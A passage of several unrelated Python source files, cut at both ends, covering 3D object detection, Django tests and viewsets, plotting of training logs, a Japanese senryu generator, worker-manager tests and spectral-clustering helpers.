self.max_detection, 1) # change dimension back to h,w,l pred_dimensions = pred_dimensions.roll(shifts=-1, dims=1) pred_dimensions = pred_dimensions.view(batch, self.max_detection, -1) pred_locations = pred_locations.view(batch, self.max_detection, -1) recall_dict = {} pred_dicts = [] for index in range(batch): pred_boxes = [pred_locations[index], pred_dimensions[index], pred_rotys[index]] pred_boxes = torch.cat(pred_boxes, dim=1) record_dict = { 'pred_boxes': pred_boxes, 'pred_scores': scores[index], 'pred_labels': clses[index] } pred_dicts.append(record_dict) # result = [clses, pred_alphas, box2d, pred_dimensions, pred_locations, pred_rotys, scores] # result = [i.type_as(result[0]) for i in result] # result = torch.cat(result, dim=1) return pred_dicts, recall_dict class SMOKEHead(nn.Module): def __init__(self, num_class, input_channels, model_cfg, predict_boxes_when_training=False, **kwargs): super(SMOKEHead, self).__init__() heads = {} heads["hm"] = num_class heads["wh"] = model_cfg.HEAD_INFO.WH heads["reg"] = model_cfg.HEAD_INFO.REG heads["reg_c"] = model_cfg.HEAD_INFO.REG_C heads["class"] = model_cfg.HEAD_INFO.CLASS_NAMES heads["norm"] = model_cfg.HEAD_INFO.NORM_FUNC heads["dep"] = model_cfg.HEAD_INFO.DEP heads["rot"] = model_cfg.HEAD_INFO.ROT heads["dim"] = model_cfg.HEAD_INFO.DIM self.predictor = SMOKEPredictor(heads, input_channels) def forward(self, features): x = self.predictor(features) return x
from django.test import TestCase from django.forms.models import model_to_dict from nose.tools import eq_ from apps.assist.unittests.factories import NoticeFactory, BannerFactory, SplashFactory from apps.assist.serializers import NoticeCreateSerializer, BannerCreateSerializer, SplashCreateSerializer class TestNoticeSerializer(TestCase): def setUp(self): self.data = model_to_dict(NoticeFactory.build()) def test_serializer_with_empty_data(self): serializer = NoticeCreateSerializer(data={}) eq_(serializer.is_valid(), False) def test_serializer_with_valid_data(self): serializer = NoticeCreateSerializer(data=self.data) eq_(serializer.is_valid(), True) class TestBannerSerializer(TestCase): def setUp(self): self.data = model_to_dict(BannerFactory.build()) def test_serializer_with_empty_data(self): serializer = BannerCreateSerializer(data={}) eq_(serializer.is_valid(), False) def test_serializer_with_valid_data(self): serializer = BannerCreateSerializer(data=self.data) eq_(serializer.is_valid(), True) class TestSplashSerializer(TestCase): def setUp(self): self.data = model_to_dict(SplashFactory.build()) def test_serializer_with_empty_data(self): serializer = SplashCreateSerializer(data={}) eq_(serializer.is_valid(), False) def test_serializer_with_valid_data(self): serializer = SplashCreateSerializer(data=self.data) eq_(serializer.is_valid(), True)
"""Loading and plotting data from CSV logs. Schematic example of usage - load all `log.csv` files that can be found by recursing a root directory: `dfs = load_logs($BABYAI_STORAGE)` - concatenate them in the master dataframe `df = pandas.concat(dfs, sort=True)` - plot average performance for groups of runs using `plot_average(df, ...)` - plot performance for each run in a group using `plot_all_runs(df, ...)` Note: - you can choose what to plot - groups are defined by regular expressions over full paths to .csv files. For example, if your model is called "model1" and you trained it with multiple seeds, you can filter all the respective runs with the regular expression ".*model1.*" - you may want to load your logs from multiple storage directories before concatening them into a master dataframe """ import os import re import numpy as np from matplotlib import pyplot import pandas import random def load_log(dir_): """Loads log from a directory and adds it to a list of dataframes.""" #dir_ = dir_.decode("utf-8") df = pandas.read_csv(os.path.join(*[dir_, 'log.csv']), error_bad_lines=False, warn_bad_lines=True) if not len(df): print("empty df at {}".format(dir_)) return df['model'] = dir_ return df def load_logs(root): dfs = [] for root, dirs, files in os.walk(root, followlinks=True): for file_ in files: if file_ == 'log.csv': dfs.append(load_log(root)) return dfs def plot_average_impl(df, regexps, y_value='return_mean', window=1, agg='mean', x_value='frames'): """Plot averages over groups of runs defined by regular expressions.""" df = df.dropna(subset=[y_value]) unique_models = df['model'].unique() model_groups = [[m for m in unique_models if re.match(regex, m)] for regex in regexps] for regex, models in zip(regexps, model_groups): df_re = df[df['model'].isin(models)] # the average doesn't make sense if most models are not included, # so we only for the period of training that has been done by all models num_frames_per_model = [df_model[x_value].max() for _, df_model in df_re.groupby('model')] median_progress = sorted(num_frames_per_model)[(len(num_frames_per_model) - 1) // 2] mean_duration = np.mean([ df_model['duration'].max() for _, df_model in df_re.groupby('model')]) df_re = df_re[df_re[x_value] <= median_progress] # smooth parts = [] for _, df_model in df_re.groupby('model'): df_model = df_model.copy() df_model.loc[:, y_value] = df_model[y_value].rolling(window).mean() parts.append(df_model) df_re = pandas.concat(parts) df_agg = df_re.groupby([x_value]).agg([agg]) values = df_agg[y_value][agg] pyplot.plot(df_agg.index, values, label=regex) #print(values) #print(regex, median_progress, mean_duration / 86400.0, values.iloc[-1]) #pyplot.show() pyplot.show() def plot_average(*args, **kwargs): """Plot averages over groups of runs defined by regular expressions.""" pyplot.figure(figsize=(15, 5)) plot_average_impl(*args, **kwargs) pyplot.legend() def plot_all_runs(df, regex, quantity='return_mean', x_axis='frames', window=1, color=None): """Plot a group of runs defined by a regex.""" pyplot.figure(figsize=(15, 5)) df = df.dropna(subset=[quantity]) kwargs = {} if color: kwargs['color'] = color unique_models = df['model'].unique() models = [m for m in unique_models if re.match(regex, m)] df_re = df[df['model'].isin(models)] for model, df_model in df_re.groupby('model'): values = df_model[quantity] values = values.rolling(window).mean() pyplot.plot(df_model[x_axis], values, label=model, **kwargs) #print(model, df_model[x_axis].max()) pyplot.legend() def plot_mean_std(dfs, color=None, y_value='validation_success_rate', show_std=False, label=None,plot_all=True, linestyle=None, compute_90val_suc_rate=False, ax=None, marker=None, plot_trend=False): if y_value == 'validation_success_rate': for df in dfs: # convert success rate to percentage df[y_value] *= 100 # if y_value == 'val_cic': # # scale for better readability # for df in dfs: # df[y_value] *= 1000 df_concat = pandas.concat((dfs)) by_row_index = df_concat.groupby(df_concat.index) df_means = by_row_index.mean()[y_value] df_stds = by_row_index.std()[y_value] num_points = len(df_means) x = np.arange(1, num_points + 1) if ax: ax.plot(x, df_means, label=label, color=color, linestyle=linestyle, marker=marker) else: fig, ax = pyplot.subplots() ax.plot(x, df_means, label=label, color=color, linestyle=linestyle, marker=marker) ax.xaxis.set_major_locator(pyplot.MaxNLocator(5)) if compute_90val_suc_rate: print('90% val success rate reached at epoch:') threshold_idx = next(x[0] + 1 for x in enumerate(list(df_means)) if x[1] >= 90.0) print(threshold_idx) if plot_trend: z = np.polyfit(x, df_means, 1) p = np.poly1d(z) pyplot.plot(x, p(x), color="#fc8d62", linestyle="--") if plot_all: for df in dfs: x = np.arange(1, len(df) + 1) if ax: ax.plot(x, df[y_value], alpha=0.25, label='_nolegend_', color=color, linestyle=linestyle) #, linewidth=0.5) #, marker=marker) else: pyplot.plot(x, df[y_value], alpha=0.25, label='_nolegend_',color=color, linestyle=linestyle) #, linewidth=0.5) #, marker=marker) if show_std: pyplot.fill_between(x, df_means - df_stds, df_means + df_stds, facecolor=color, alpha=0.5) def plot_compared_models(log_roots, nr_runs, title, legend_labels=None, max_update=35, show_std=False, plot_all=True, y_value='validation_success_rate', filename=None, compute_90val_suc_rate=False, plot_trend=False): pyplot.rc('font', size=18) #14-18 #colors = ['#66c2a5', '#fc8d62', '#ffd92f', '#8da0cb', '#e78ac3', '#a6d854'] colors = ['#fc8d62', '#66c2a5', '#8da0cb', '#e78ac3', '#a6d854', '#ffd92f'] markers = ['o', 'v', '^', 's', '+', 'x'] if legend_labels is None: legend_labels = [root.split('/')[-1] for root in log_roots] fig, ax = pyplot.subplots(figsize=(7,5)) #(12,5) for idx, root in enumerate(log_roots): dirs = [root + str(i) for i in range(1, nr_runs + 1)] dfs = [] for dir in dirs: try: dfs += [load_log(dir).query('update <=' + str(max_update))] except: pass plot_mean_std(dfs, label=legend_labels[idx], show_std=show_std,plot_all=plot_all,color=colors[idx], marker=markers[idx], y_value=y_value, compute_90val_suc_rate=compute_90val_suc_rate, plot_trend=plot_trend, ax=ax) pyplot.xlabel('epochs') if y_value == 'validation_success_rate': pyplot.ylabel('validation success %') pyplot.ylim(0, 102) elif y_value == 'correction_weight_loss': pyplot.ylabel('guidance weight') elif y_value == 'val_cic': #pyplot.ylabel(r'CIC $\times 10^3$') pyplot.ylabel('CIC') #pyplot.title(title) pyplot.legend(loc=4) #pyplot.legend(loc='upper center', bbox_to_anchor=(0.5, -0.5)) pyplot.tight_layout() #pyplot.show() pyplot.savefig(filename) pyplot.clf() def plot_cic(cic_file,): with open(cic_file, 'r') as cf: values = [float(item) for item in cf.readlines()] pyplot.plot(np.arange(1, len(values) + 1), values, '-o') pyplot.xlabel('epoch') pyplot.ylabel('CIC metric') pyplot.title('CIC in Learner + pretrained Corrector, GoToObj') pyplot.show() def plot_two_vars(log_root, nr_runs, vars, title, max_update=200, show_std=False, plot_all=True, filename=None): pyplot.rc('font', size=13) # 18 colors = ['#fc8d62', '#66c2a5', '#8da0cb', '#e78ac3', '#a6d854', '#ffd92f'] linestyles = ['-', '--', '-.', (0, (5, 1)), (0, (3, 1, 1, 1)), (0, (1, 1))] fig, ax1 = pyplot.subplots() dirs = [log_root + str(i) for i in range(1, nr_runs + 1)] dfs = [] for dir in dirs: # print(dir) try: dfs += [load_log(dir).query('update <=' + str(max_update))] except: pass ax1.set_xlabel('epochs') ax1.set_ylabel('validation success %', color=colors[0]) plot_mean_std(dfs, label=vars[0], show_std=show_std, plot_all=plot_all, color=colors[0], linestyle=linestyles[0], y_value=vars[0], ax = ax1) ax1.tick_params(axis='y', labelcolor=colors[0]) ax2 = ax1.twinx() # instantiate a second axes that shares the same x-axis ax2.set_ylabel('guidance weight', color=colors[1]) # we already handled the x-label with ax1 plot_mean_std(dfs, label=vars[1], show_std=show_std, plot_all=plot_all, color=colors[1], linestyle=linestyles[1], y_value=vars[1], ax=ax2) ax2.tick_params(axis='y', labelcolor=colors[1]) fig.tight_layout() # otherwise the right y-label is slightly clipped pyplot.title(title) #pyplot.show() pyplot.savefig(filename) pyplot.clf() # EXAMPLES # # roots = ['/Users/mathijs/Documents/Studie/AI/Thesis/code/babyai-repo/logs/pickuploc/pickuploc-nocor', # '/Users/mathijs/Documents/Studie/AI/Thesis/code/babyai-repo/logs/pickuploc/pickuploc-pretrainedcor-ownvocab', # '/Users/mathijs/Documents/Studie/AI/Thesis/code/babyai-repo/logs/pickuploc/pickuploc-pretrainedcor-gotolocal', # '/Users/mathijs/Documents/Studie/AI/Thesis/code/babyai-repo/logs/pickuploc/pickuploc-pretrainedcor-putnextlocal', # '/Users/mathijs/Documents/Studie/AI/Thesis/code/babyai-repo/logs/pickuploc/pickuploc-pretrainedlearner-gotolocal', # '/Users/mathijs/Documents/Studie/AI/Thesis/code/babyai-repo/logs/pickuploc/pickuploc-pretrainedlearner-putnextlocal', # # '/Users/mathijs/Documents/Studie/AI/Thesis/code/babyai-repo/logs/pickuploc/pickuploc-pretrainedcor-multicor' # ] # # labels = ['Learner', # 'Learner + Guide, pretrained at same level', # 'Learner + Guide, pretrained at GoToLocal', # 'Learner + Guide, pretrained at PutNextLocal', # 'Learner, pretrained at GoToLocal', # 'Learner, pretrained at PutNextLocal' # #'Learner + Guide, \n pretrained at 3 levels' # ] # # plot_compared_models(log_roots=roots, nr_runs=3, title='PickupLoc', legend_labels=labels, # max_update=25, # plot_all=False, # filename='pickuploc-interlevel.pdf') # roots = ['/Users/mathijs/Documents/Studie/AI/Thesis/code/babyai-repo/logs/gotoobj/gotoobj-pretrainedcor-cic', # '/Users/mathijs/Documents/Studie/AI/Thesis/code/babyai-repo/logs/gotolocal/gotolocal-pretrainedcor-cic', # '/Users/mathijs/Documents/Studie/AI/Thesis/code/babyai-repo/logs/gotoobjmaze/gotoobjmaze-pretrainedcor-cic', # '/Users/mathijs/Documents/Studie/AI/Thesis/code/babyai-repo/logs/pickuploc/pickuploc-pretrainedcor-cic', # '/Users/mathijs/Documents/Studie/AI/Thesis/code/babyai-repo/logs/putnextlocal/putnextlocal-pretrainedcor-cic', # '/Users/mathijs/Documents/Studie/AI/Thesis/code/babyai-repo/logs/goto/goto-pretrainedcor-ownvocab', # ] # # labels = ['GoToObj', # 'GoToLocal', # 'GoToObjMaze', # 'PickupLoc', # 'PutNextLocal', # 'GoTo' # ] # # epochs = [20, # 25, # 8, # 25, # 25, # 25 # ] # # for idx, root in enumerate(roots): # label = [labels[idx]] # plot_compared_models(log_roots=[root], nr_runs=3, title='CIC', # legend_labels=label, max_update=epochs[idx], # y_value='val_cic', # show_std=True, # plot_all=False, # filename=str(label) + '-cic.pdf', # plot_trend=True)
#!/usr/bin/env python from __future__ import absolute_import, division, print_function try: from buildbot_pkg import setup_www_plugin except ImportError: import sys print("Please install buildbot_pkg module in order to install that package, or use the pre-build .whl modules available on pypi", file=sys.stderr) sys.exit(1) setup_www_plugin( name='dashboard-test', description='', author=u'Pierre Tardy', author_email=u'tardyp@gmail.com', url='/', license='Apache-2.0', packages=['dashboard_test'], package_data={ '': [ 'VERSION', 'static/*' ] }, entry_points=""" [buildbot.www] dashboard_test = dashboard_test:ep """, )
#追加ライブラリ import urllib import xml.etree.ElementTree as elementtree import MeCab import random WIKI_URL = u"http://wikipedia.simpleapi.net/api?keyword=" class CreateResult: senryu = '' furigana = '' errormessage = '' word = '' url = '' def createSenryu(serch_word): utftext = serch_word.encode('utf-8') urlencode = urllib.parse.quote(utftext, '') request = urllib.request.Request(WIKI_URL + urlencode) result = CreateResult() with urllib.request.urlopen(request) as response: XmlData = response.read() if len(XmlData) == 0: result.errormessage = 'Wikipediaに該当ページがありませんでした。' return result root = elementtree.fromstring(XmlData) if len(root) == 0: result.errormessage = 'Wikipediaに該当ページがありませんでした。' return result result.url = root[0][2].text result.word = root[0][3].text tagger = MeCab.Tagger('-Ochasen') nodes = tagger.parseToNode(root[0][4].text) bunsetsulist = [] PoemPartslist = [] kamigolist = [] nakashichilist = [] shimogolist = [] spellCount = 0 while nodes: #長文のため分割したいが、いい方法が思い浮かばず保留 splitData = nodes.feature.split(',') SplitLength = len(splitData) if SplitLength <= 7: bunsetsulist = [] spellCount= 0 nodes = nodes.next continue furigana = splitData[7] furiganaCount = mojiCount(furigana) spellCount += furiganaCount bunsetsulist.append(nodes) if splitData[0] in '記号': bunsetsulist = [] spellCount= 0 nodes = nodes.next continue if splitData[0] in '助詞' and len(bunsetsulist) == 1: bunsetsulist = [] spellCount= 0 nodes = nodes.next continue if splitData[0] in '助動詞' and len(bunsetsulist) == 1: bunsetsulist = [] spellCount= 0 nodes = nodes.next continue if splitData[1] in '非自立' and len(bunsetsulist) == 1: bunsetsulist = [] spellCount= 0 nodes = nodes.next continue if splitData[1] in '接尾' and len(bunsetsulist) == 1: bunsetsulist = [] spellCount= 0 nodes = nodes.next continue if splitData[5] in '未然レル接続' and (furiganaCount == 5 or furiganaCount == 7): bunsetsulist = [] spellCount= 0 nodes = nodes.next continue if splitData[0] in '接頭詞' and (furiganaCount == 5 or furiganaCount == 7): bunsetsulist = [] spellCount= 0 nodes = nodes.next continue if furigana in '*': bunsetsulist = [] spellCount= 0 nodes = nodes.next continue if is_sokuon(furigana[-1]) and (furiganaCount == 5 or furiganaCount == 7): bunsetsulist = [] spellCount= 0 nodes = nodes.next continue if spellCount == 5: gobiindex = len (bunsetsulist) if IsKire(bunsetsulist[gobiindex - 1]) == True: kamigolist.append(list(bunsetsulist)) shimogolist.append(list(bunsetsulist)) else: kamigolist.append(list(bunsetsulist)) if spellCount == 7: nakashichilist.append(list(bunsetsulist)) bunsetsulist = [] spellCount= 0 if furiganaCount == 7 : nodes = nodes.next continue if spellCount > 7: bunsetsulist = [] spellCount= 0 if furiganaCount > 7 : nodes = nodes.next continue nodes = nodes.next furigana = '' senryu = '' bunsho = [] create = False for count in range(10): #長文のため分割したいが、いい方法が思い浮かばず保留 furigana = '' senryu = '' bunsho = [] create = False if len(kamigolist) == 0 or len(nakashichilist) == 0 or len(shimogolist) == 0: result.errormessage = '句の素材がたりず、生成できませんでした。' return result kamigo = random.choice(kamigolist) nakashichi = random.choice(nakashichilist) shimogo = random.choice(shimogolist) kamigofurigana = '' nakahachifurigana = '' simogofurigana = '' for spell in kamigo: senryu += spell.surface kamigofurigana += spell.feature.split(',')[7] bunsho.append(spell) for spell in nakashichi: senryu += spell.surface nakahachifurigana += spell.feature.split(',')[7] bunsho.append(spell) for spell in shimogo: senryu += spell.surface simogofurigana += spell.feature.split(',')[7] bunsho.append(spell) furigana += kamigofurigana furigana += nakahachifurigana furigana += simogofurigana #'上五と下五が同じの場合は作り直し' if kamigofurigana == simogofurigana: continue #'中七に上五が含まれている場合は作り直し' if nakahachifurigana.find(kamigofurigana) != -1: continue #'中七に下五が含まれている場合は作り直し' if nakahachifurigana.find(simogofurigana) != -1: continue #上五、中七、下五すべての末で切れている場合は作り直し Kamigokire = IsKire(kamigo[len(kamigo) - 1]) Nakahachikire = IsKire(nakashichi[len(nakashichi) - 1]) Shimogokire = IsKire(shimogo[len(shimogo) - 1]) if Kamigokire and Nakahachikire and Shimogokire: continue #動詞が2つ以上ある場合は作り直し doshicount = 0 for spell in bunsho: splitData = spell.feature.split(',') if splitData[0] in '動詞': doshicount+= 1 if doshicount >= 2: continue create = True break if create == False: result.errormessage = '川柳が作成できませんでした。別の単語を入力してください。' return result result.senryu = senryu result.furigana = furigana return result def IsKire(nodes): splitData = nodes.feature.split(',') if splitData[5] in '基本形': return True elif splitData[0] in '名詞': return True else: return False def mojiCount(furigana): mojicount = 0 for moji in furigana: if is_youon(moji) == False: mojicount += 1 return mojicount def is_youon(moji): youon = ['ぁ', 'ぃ', 'ぅ', 'ぇ', 'ぉ', 'ゃ', 'ゅ', 'ょ', 'ァ', 'ィ', 'ゥ', 'ェ', 'ォ', 'ャ', 'ュ', 'ョ'] return moji in youon def is_sokuon(moji): sokuon = ['っ','ッ'] return moji in sokuon
from django_filters import rest_framework as filters from rest_framework import viewsets from rest_framework.decorators import action from rest_framework.generics import get_object_or_404 from rest_framework.permissions import IsAuthenticated from rest_framework.response import Response from care.facility.api.mixins import UserAccessMixin from care.facility.api.serializers.patient import ( FacilityPatientStatsHistorySerializer, PatientDetailSerializer, PatientSerializer, ) from care.facility.api.serializers.patient_consultation import PatientConsultationSerializer from care.facility.models import Facility, FacilityPatientStatsHistory, PatientConsultation, PatientRegistration class PatientFilterSet(filters.FilterSet): phone_number = filters.CharFilter(field_name="phone_number") class PatientViewSet(UserAccessMixin, viewsets.ModelViewSet): permission_classes = (IsAuthenticated,) queryset = PatientRegistration.objects.filter(deleted=False) serializer_class = PatientSerializer filter_backends = (filters.DjangoFilterBackend,) filterset_class = PatientFilterSet def get_serializer_class(self): if self.action == "retrieve": return PatientDetailSerializer elif self.action == "history": return PatientConsultationSerializer else: return self.serializer_class def get_queryset(self): if self.request.user.is_superuser: return self.queryset return self.queryset.filter(created_by=self.request.user) @action(detail=True, methods=["get"]) def history(self, request, *args, **kwargs): user = request.user queryset = PatientConsultation.objects.filter(patient__id=self.kwargs.get("pk")) if not user.is_superuser: queryset = queryset.filter(patient__created_by=user) return Response(data=self.get_serializer_class()(queryset, many=True).data) class FacilityPatientStatsHistoryFilterSet(filters.FilterSet): entry_date = filters.DateFromToRangeFilter(field_name="entry_date") class FacilityPatientStatsHistoryViewSet(viewsets.ModelViewSet): permission_classes = (IsAuthenticated,) queryset = FacilityPatientStatsHistory.objects.all().order_by("-entry_date") serializer_class = FacilityPatientStatsHistorySerializer filter_backends = (filters.DjangoFilterBackend,) filterset_class = FacilityPatientStatsHistoryFilterSet http_method_names = ["get", "post", "delete"] def get_queryset(self): queryset = super().get_queryset() return queryset.filter(facility_id=self.kwargs.get("facility_pk")) def get_object(self): return get_object_or_404(self.get_queryset(), id=self.kwargs.get("pk")) def get_facility(self): facility_qs = Facility.objects.filter(pk=self.kwargs.get("facility_pk")) if not self.request.user.is_superuser: facility_qs.filter(created_by=self.request.user) return get_object_or_404(facility_qs) def perform_create(self, serializer): return serializer.save(facility=self.get_facility()) def list(self, request, *args, **kwargs): """ Patient Stats - List Available Filters - entry_date_before: date in YYYY-MM-DD format, inclusive of this date - entry_date_before: date in YYYY-MM-DD format, inclusive of this date """ return super(FacilityPatientStatsHistoryViewSet, self).list(request, *args, **kwargs)
# Copyright 2020 DeepMind Technologies Limited. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tests for launchpad.launch.worker_manager.""" import os import signal import threading import time from absl.testing import absltest from launchpad.launch import worker_manager import mock class WorkerManagerTest(absltest.TestCase): def setUp(self): super().setUp() self._sigterm_patcher = mock.patch.object( signal, 'SIGTERM', new=signal.SIGUSR1) self._sigterm_patcher.start() self._sigint_patcher = mock.patch.object( signal, 'SIGINT', new=signal.SIGUSR2) self._sigint_patcher.start() self._manager = worker_manager.WorkerManager() self.addCleanup(self._manager.cleanup_after_test, self) def tearDown(self): self._sigterm_patcher.stop() self._sigint_patcher.stop() super().tearDown() def test_wait_for_stop(self): def waiter(): self._manager.wait_for_stop() self._manager.thread_worker('worker', waiter) os.kill(os.getpid(), signal.SIGTERM) def test_slow_termination(self): def waiter(): self._manager.wait_for_stop() time.sleep(1) self._manager.thread_worker('worker', waiter) os.kill(os.getpid(), signal.SIGTERM) def test_system_exit(self): def waiter(): try: while True: time.sleep(0.1) except SystemExit: pass self._manager.thread_worker('worker', waiter) os.kill(os.getpid(), signal.SIGTERM) def test_stop_and_wait(self): def waiter(): self._manager.wait_for_stop() self._manager.thread_worker('worker1', waiter) self._manager.thread_worker('worker2', waiter) self._manager.thread_worker('worker3', waiter) self._manager.stop_and_wait() def test_failure_wait(self): def waiter(): self._manager.wait_for_stop() def failure(): raise Exception('Error') self._manager.thread_worker('waiter', waiter) self._manager.thread_worker('failure', failure) with self.assertRaisesRegexp( Exception, 'Error'): self._manager.wait(['waiter']) self._manager.wait() def test_return_on_first_completed(self): def waiter(): self._manager.wait_for_stop() def worker(): pass self._manager.thread_worker('waiter', waiter) self._manager.thread_worker('worker', worker) self._manager.wait(return_on_first_completed=True) def test_dont_raise_error(self): def failure(): raise Exception('Error') self._manager.thread_worker('failure', failure) self._manager.wait(raise_error=False) with self.assertRaisesRegexp( Exception, 'Error'): self._manager.wait() def test_process_worker_stop(self): self._manager.process_worker('sleep', ['sleep', '3600']) self._manager.stop_and_wait() def test_process_worker_failure(self): self._manager.process_worker('failure', ['cat', 'missing_file']) with self.assertRaisesRegexp( RuntimeError, 'One of the workers failed.'): self._manager.wait() if __name__ == '__main__': absltest.main()
import redis r = redis.Redis(host='localhost', port=6379, db=0) r.set('foo', 'bar') x = r.get('foo') print(x) r.set(x,'baz') x = r.get(x) print(x)
from dynamic_graph.sot.torque_control.control_manager import ControlManager from dynamic_graph.sot.torque_control.tests.robot_data_test import initRobotData from numpy import array, ones, zeros # Instanciate the free flyer cm = ControlManager("cm_test") q = zeros(initRobotData.nbJoints + 6) dq = zeros(initRobotData.nbJoints) bemfFactor = ones(initRobotData.nbJoints) max_current = 30.0 * ones(initRobotData.nbJoints) max_tau = 100.0 * ones(initRobotData.nbJoints) percentageDriverDeadZoneCompensation = 20.0 * ones(initRobotData.nbJoints) signWindowsFilterSize = ones(initRobotData.nbJoints) tau = 100.0 * ones(initRobotData.nbJoints) tau_predicted = 110.0 * ones(initRobotData.nbJoints) pwmDes = 100.0 * ones(initRobotData.nbJoints) currentDes = 100.0 * ones(initRobotData.nbJoints) cm.controlDT = 0.005 # Initializing the input ports # Setting the robot configuration cm.add_signals() cm.i_max.value = max_current cm.u_max.value = max_tau cm.tau.value = tau cm.tau_predicted.value = tau_predicted cmInitRobotData = initRobotData() cmInitRobotData.init_and_set_controller_manager(cm) # Specify control mode ## # Add position mode cm.addCtrlMode("pos") # Add torque mode cm.addCtrlMode("torque") cm.add_signals() cm.ctrl_torque.value = array(currentDes) cm.ctrl_pos.value = pwmDes cm.setCtrlMode("all", "pos")
from .Node import Node from Utils.config import * from Utils.constants import * class LoopNode(Node): def __init__(self, depth, node_type, anchor): super().__init__(depth, node_type, anchor.get_regex()) self.go_back = anchor.is_goback_anchor() def __str__(self): return f"Node {self.type} (simple) to {self.label}" def is_goback_node(self): return self.go_back def is_control(self): return False def is_multiple_labels(self): return False def is_label(self): return False def add_child(self, node, match=False): if self.is_label(): if node.get_type() != NODE_LABEL and not self.is_goback_node(): # We don't want the child return elif self.is_control(): if not match: return super().add_child(node) def is_complete(self): if self.go_back: return len(self.childs) == 2 #One child is the next node, one because of the loop else: return len(self.childs) == 1 def go_back_label(self): if self.go_back: return self.label
''' Author: W.R. Jackson, Damp Lab 2020 ''' import datetime import logging import sys import colorama class SingletonBaseClass(type): _instances = {} def __call__(cls, *args, **kwargs): """ Possible changes to the value of the `__init__` argument do not affect the returned instance. """ if cls not in cls._instances: instance = super().__call__(*args, **kwargs) cls._instances[cls] = instance return cls._instances[cls] class BLogger(metaclass=SingletonBaseClass): ''' Simple Custom Logger to enable colorized text output as well as discrete control over setting logging levels for debugging. ''' def __init__(self): logging.basicConfig( filename=f'beholder_{datetime.datetime.now().isoformat()}.log', format='[%(asctime)s] [%(levelname)s] %(message)s', datefmt='%Y-%m-%d %H:%M:%S', level=logging.DEBUG, ) logging.getLogger().addHandler(logging.StreamHandler(sys.stdout)) self.log = logging.getLogger(__name__) self.log.setLevel(logging.INFO) # This only performs any kind of action on a windows machine, # otherwise it's a no-op. colorama.init(autoreset=True) # def write_out(self, output_fp: str): # self.log.() def change_logging_level(self, logging_level: str): ''' Args: logging_level: Returns: ''' logging_level = logging_level.upper() if logging_level == "DEBUG": self.log.setLevel(logging.DEBUG) if logging_level == "INFO": self.log.setLevel(logging.INFO) if logging_level == "WARNING": self.log.setLevel(logging.WARNING) if logging_level == "ERROR": self.log.setLevel(logging.ERROR) if logging_level == "CRITICAL": self.log.setLevel(logging.CRITICAL) else: print( f'Unable to recognize passed in logging level {logging_level}' ) def debug(self, message: str): ''' Args: message: Returns: ''' self.log.debug( f'{message}' ) def info(self, message: str): ''' Args: message: Returns: ''' self.log.info( f'{message}' ) def warning(self, message: str): ''' Args: message: Returns: ''' self.log.warning( f'{message}' ) def error(self, message: str): ''' Args: message: Returns: ''' self.log.error( f'{message}' ) def critical(self, message: str): ''' Args: message: Returns: ''' # Magenta is the most ominous color. self.log.critical( f'{message}' ) def damp_themed(self, message: str): ''' Args: message: Returns: ''' self.log.info( f'{message}' )
''' Created on 2013/04/25 @author: duongnt ''' import numpy as np from scipy.linalg import eig from scipy import spatial # for kdtree import matplotlib.pyplot as plt from sklearn.metrics.pairwise import euclidean_distances from sklearn.decomposition import PCA from mpl_toolkits.mplot3d import Axes3D def loadData(filename): """ Load data from file. Returns: ------------------- Data matrix X of size n x d n: the number of samples d: the dimensionality of data sample. """ X = [] with open(filename, 'rt') as fin: for line in fin: row = map(float, line.strip().split(',')) X.append(row) X = np.asarray(X, dtype='float64') return X def plotData(data, figname): """ Plot data and save the figure in file. Args: -------------- data: n x d matrix (ndarray) figname: figure file name """ d = data.shape[1] assert d <= 3, "Up to 3D data!" if d == 2: # 2D plt.scatter(data[:,0], data[:,1], c='r', marker='x', label='2-dim') plt.legend(loc='best', prop={'size':20}) plt.axis('equal') plt.savefig(figname) elif d == 3: # 3D fig = plt.figure() ax = fig.add_subplot(111, projection='3d') ax.plot(data[:,0], data[:,1], data[:,2], 'rx', label='3-dim') ax.legend(loc='best', prop={'size':20}) ax.view_init(50,80) # view angle plt.savefig(figname) else: pass def sqDist(X): """ Compute the pair-wise distance matrix between row vectors of X (samples). Args: ------------------ X: n x d matrix of n samples Returns: -------------------- sqD of size n x n, where sqD_{i,j} = || xi - xj ||^2 """ n = X.shape[0] # number of samples tX = X.T # tX has size d x n sq = np.sum(tX**2, axis=0) A = np.tile(sq, (n,1)) B = A.T C = np.dot(X, tX) sqD = A + B - 2*C return sqD def sqDist2(X): """ Compute the pair-wise distance matrix between row vectors of X, using sklearn.metrics.pairwise.euclidean_distances. Args: ----------- X: n x d Returns: ------------ sqD of size n x n, where sqD_{i,j} = || xi - xj ||^2 """ return euclidean_distances(X, X, squared=True) def dist_based_sim(X, gamma=0.5): """ Construct distance-based similarity matrix W. W_ij = exp(-|| xi - xj ||^2 / (gamma^2)). By using square distance matrix sqD above, we can compute W easily. Args: -------------------------------- X: n x d matrix of n samples gamma: tuning parameter > 0 Returns: ---------------------------------------- Similarity matrix W of size n x n """ sqD = sqDist2(X) W = np.exp(-sqD/(gamma**2)) return W def local_scaling_based_sim(X, kv=7): """ Compute distance-based similarity matrix, using local scaling heuristic. See L. Zelnik-Manor & P. Perona, Self-tuning spectral clustering, Advances in NIPS 17, 1601-1608, MIT Press, 2005 for heuristically choosing k value. """ tree = spatial.KDTree(X) # use KDTree for knn fast queries. n = X.shape[0] gammas = [] for i in range(n): gammas.append(tree.query(X[i], k=kv)[0][-1]) # compute the distance btw X[i] and its k-th nearest neighbor gammas = np.asarray(gammas, dtype='float64') localMat = np.dot(gammas.reshape(n,1), gammas.reshape(1,n)) # localMat[i,j] = gamma_i x gamma_j sqD = sqDist2(X) W = np.exp(-sqD/localMat) return W def knn_based_sim(X, kv=7): """ Compute k-nearest-neighbor-based similarity matrix W Args: --------- X: n x d matrix of n samples kv: k value in knn. Returns: W: n x n matrix, where W_{i,j} = 1 if x_i is knn of x_j or x_j is knn of x_i W_{i,j} = 0, otherwise. """ tree = spatial.KDTree(X) n = X.shape[0] knn_idx = [] for i in range(n): knn_idx.append(tree.query(X[i], k=kv)[1]) W = np.zeros((n,n), dtype='int') for i in range(n): for j in range(i,n): if (i in knn_idx[j]) or (j in knn_idx[i]): W[i,j] = 